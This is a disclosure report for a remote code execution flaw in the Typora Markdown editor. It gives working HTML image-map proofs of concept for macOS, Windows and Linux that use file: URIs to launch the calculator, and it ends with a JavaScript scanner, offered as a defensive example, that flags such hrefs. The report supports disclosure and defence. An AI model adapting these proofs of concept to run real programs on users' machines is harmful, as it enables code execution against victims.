Closed
Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability
Description:
Typora fails to sanitize input on HTML attributes. Abusing the file:\\ URI scheme on HTML attributes can result in arbitrary code execution. The proofs of concept below will execute the calculator when opened inside of Typora (macOS, Linux, Windows). Attached are screenshots as well as the .md files that trigger the vulnerability (PoC.zip).
Tested On: macOS 10.14.2, Ubuntu 18.04, Windows 10
Proofs of Concept:
macOS:
```html
<!DOCTYPE html>
<html>
<body>
<p>
Click me!
</p>
<img src="exploit.gif" width="145" height="126" usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
<area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\Applications\Calculator.app">
</map>
</body>
</html>
```
Windows:
```html
<!DOCTYPE html>
<html>
<body>
<p>
Click me!
</p>
<img src="exploit.gif" width="145" height="126" usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
<area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file://C|Windows/System32/calc.exe">
</map>
</body>
</html>
```
Linux:
```html
<!DOCTYPE html>
<html>
<body>
<p>
Click me!
</p>
<img src="exploit.gif" width="145" height="126" usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
<area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\">
</map>
</body>
</html>
```
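A defensive counterpart to the report above, added here as an example and not taken from Typora or from the reporter: a scheme allowlist for `href` values found in untrusted Markdown/HTML, normalising backslashes first so that `file:\\\` and `file:///` are judged alike. The function names, the allowlist contents and the sample markup are assumptions made for this illustration.

```javascript
// Added example (not Typora's code): allowlist href targets from untrusted Markdown/HTML.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]); // assumed policy

// Decide whether one href value may be followed or handed to the OS.
function classifyLinkTarget(raw) {
  // Mirror URL-parser leniency: drop tab/CR/LF, trim control chars and spaces,
  // and treat "\" as "/" so "file:\\\" and "file:///" are judged alike.
  const value = String(raw)
    .replace(/[\t\r\n]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/\\/g, "/");
  if (value.startsWith("#")) return { allowed: true, reason: "in-document anchor" };
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(value);
  // No scheme means a relative or UNC-style path that resolves against the
  // local file system; a drive letter such as "C:" parses as an unknown scheme.
  if (!m) return { allowed: false, reason: "no scheme (local or relative path)" };
  const scheme = m[1].toLowerCase();
  return ALLOWED_SCHEMES.has(scheme)
    ? { allowed: true, reason: `scheme ${scheme}` }
    : { allowed: false, reason: `scheme ${scheme} not allowlisted` };
}

// Scan markup for href attributes and return the ones the policy rejects.
// A regex scan is enough for auditing a file; a renderer should apply
// classifyLinkTarget to the parsed DOM or in its navigation handler instead.
function findBlockedTargets(markup) {
  const attr = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const blocked = [];
  for (const m of markup.matchAll(attr)) {
    const value = m[1] ?? m[2] ?? m[3];
    const verdict = classifyLinkTarget(value);
    if (!verdict.allowed) blocked.push({ value, reason: verdict.reason });
  }
  return blocked;
}

// Constructed sample: the three href forms from the report plus benign links.
const SAMPLE = String.raw`
<a href="https://example.com/docs">docs</a> <a href="#usage">usage</a>
<area href="file:\\\Applications\Calculator.app">
<area href="file://C|Windows/System32/calc.exe">
<area href="file:\\\">
<a href=" FILE:///etc/hosts">mixed case, leading space</a>
`;

for (const hit of findBlockedTargets(SAMPLE)) {
  console.log(`href=${JSON.stringify(hit.value)} -> ${hit.reason}`);
}
```

Only `href` is checked because that is the attribute the proofs of concept use; relative `src` paths for images are normal in Markdown and need a separate policy.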